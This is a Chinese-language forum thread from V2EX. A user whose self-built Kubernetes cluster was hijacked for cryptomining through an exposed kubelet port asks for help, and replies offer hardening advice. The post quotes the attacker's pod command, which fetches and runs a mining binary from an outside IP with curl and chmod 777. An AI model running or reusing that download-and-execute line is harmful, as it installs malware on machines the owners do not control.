首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
V2EX  ›  问与答

k8s 被人拿去挖矿了

  •  
  •   shisang · 50 天前 · 2518 次点击
    这是一个创建于 50 天前的主题,其中的信息可能已经有所发展或是发生改变。

    在腾讯云学生机上自己折腾 k8s,并把 blog 部署在上边,结果两天上去怎么多那么多 pod。

    top

    kubectl get pods

    ps aux | grep k.conf

    查看 /tmp/docker, 没有了估计是屁股被擦干净了。

    订阅轻重一个 pod

    Command:
          sh
          -c
          curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json
    
    

    找到了一篇一样遭遇的文章http://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html 按照作者所说应该是 10250 端口暴露到外网了。

    netstat -lnpt | grep 10250 果不其然。

    先杀死挖矿 pods,

    kubectl get pods | grep y1ee4 | awk '{print $1}' | xargs kubectl delete --grace-period=0 --force pods

    kubectl get pods

    有重新创建了,日了

    kubectl get rc 然后 delete rc,赶紧查看是不是哪里配置写错了。

    新手,大神路过指导一二。

    23 回复  |  直到 2018-08-03 18:04:03 +08:00
        1
    shisang   50 天前
    消灭零回复
        2
    des   50 天前 via Android
    重装最简单了
        3
    shisang   50 天前
    @des 要不要那么暴力
        4
    wtks1   50 天前 via Android
    重装是最暴力但最有效的办法
        5
    murmur   50 天前
    @shisang linux 没杀软 没那么多 windows 的花式检查工具 真的只能重装
        6
    murmur   50 天前
    别人甚至还可以替换掉你的常用命令
        7
    artandlol   50 天前 via iPhone
    @wtks1 只要不是用 root 用户登 docker 就没必要重装
        8
    artandlol   50 天前 via iPhone
    启 rbacc 客户端启用 token docker 用户不应该是 root
        9
    qfdk   50 天前 via iPhone
    docker 开了 remote api 了吧 我也中了 都是 docker 中运行 然后从容器里跑出来的 最后让我消灭了…… 本来是开了 api 做测试的 两天就被挖坑了
        10
    artandlol   50 天前 via iPhone
    然后 kubectl -o 出 yamll 然后 delete 看你是用 root 跑,最好还是回滚到之前的
        11
    abmin521   50 天前 via Android
    刚好研究过
    关闭 kubelet 的匿名访问 双向 tls 就行了
    kubeadm 就没有这个 bug
    有空准备扫一波
        12
    cqxxxxxxx   50 天前
    lz 是一台机器 minikube 搭的 k8s?还是好几台机器搭的集群?
        13
    DesignerSkyline   50 天前
    重装吧,二进制已经被污染了
        14
    shisang   50 天前
    @abmin521 之前在 vultr 是 kubeadm 装过,运行挺好,就是国内装不上,用 privoxy 代理也不行。但是 vultr 坑爹了,重启后 ip ping 不通,要手动修改网络配置。要手动在网页 console 输入密码十几次每一次对的,最后客服说可以通过 sysroot 修改密码,按照文档操作后直接 unknown user,弃坑~!
        15
    shisang   50 天前
    @cqxxxxxxx 1cpu 2G memory 的鹅厂学生机,源码安装的单节点~~~~~逃
        16
    shisang   50 天前
    @qfdk 没有该 docker,是 k8s 污染进来的
        17
    mritd   50 天前
    你多半是看了那个 无良教程 apiserver 监听 :8080 了吧
        18
    E1n   50 天前 via Android
    单机能学到什么东西,褥 gcp 玩玩集群吧
        19
    580a388da131   50 天前 via Android
    不是有安全组吗?你开了所有端口?
        20
    0312birdzhang   50 天前 via iPhone
    直接删 pod 要是能删掉的话 deployment、rc、daemonset 是干嘛的😷
        21
    znood   49 天前 via iPhone
    查看 k8s 所有资源,把可疑的删掉,只删 pod 没用的,kubelet 会自动创建
        22
    shisang   49 天前
    @580a388da131 为了方便测试,安全之前设置为 all,所有端口放行了~~
        23
    shisang   49 天前
    @E1n 现在下岗,没钱~!
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   1252 人在线   最高记录 3762   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.1 · 20ms · UTC 00:18 · PVG 08:18 · LAX 17:18 · JFK 20:18
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1